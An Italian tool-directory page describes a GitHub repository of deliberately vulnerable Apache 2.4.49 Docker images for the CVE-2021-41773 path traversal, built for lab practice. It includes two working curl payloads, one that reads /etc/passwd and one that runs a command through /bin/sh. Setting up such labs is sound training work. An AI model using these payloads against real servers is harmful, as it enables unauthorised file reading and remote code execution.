Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41773 — Immagini Docker vulnerabili per CVE-2021-41773 | Kitploit
Strumenti/GitHubGitHub/blueteamsteve/cve-2021-41773
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubblueteamsteve/cve-2021-41773

CVE-2021-41773

Immagini Docker vulnerabili per CVE-2021-41773

Vedi Repository
23824 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Immagini Docker vulnerabili per CVE-2021-41773 path traversal di Apache

Questa vulnerabilità si applica solo alla versione 2.4.49 con specifiche configurazioni non predefinite. In alcune situazioni, ciò può portare a lettura di file o esecuzione di codice.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Configurazione vulnerabile per lettura file

I container possono essere scaricati direttamente da Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:no-cgid

ed eseguiti usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

I log di Apache possono essere visualizzati usando il comando seguente, oppure è sufficiente omettere "-dit" dal comando run sopra per visualizzare lo stdio docker logs <container-id>

PoC per lettura file

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Configurazione vulnerabile per RCE

I container possono essere scaricati direttamente da Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:with-cgid

ed eseguiti usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

I log di Apache possono essere visualizzati usando il comando seguente, oppure è sufficiente omettere "-dit" dal comando run sopra per visualizzare lo stdio docker logs <container-id>

PoC per RCE

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Crea container Docker personalizzati

Modifica e crea le tue versioni usando il Dockerfile e i file httpd.conf di esempio nelle sottodirectory

  • Usa ./no-cgi per la configurazione vulnerabile alla lettura file
  • Usa ./with-cgi per la configurazione vulnerabile all'esecuzione di codice
Scarica lo strumento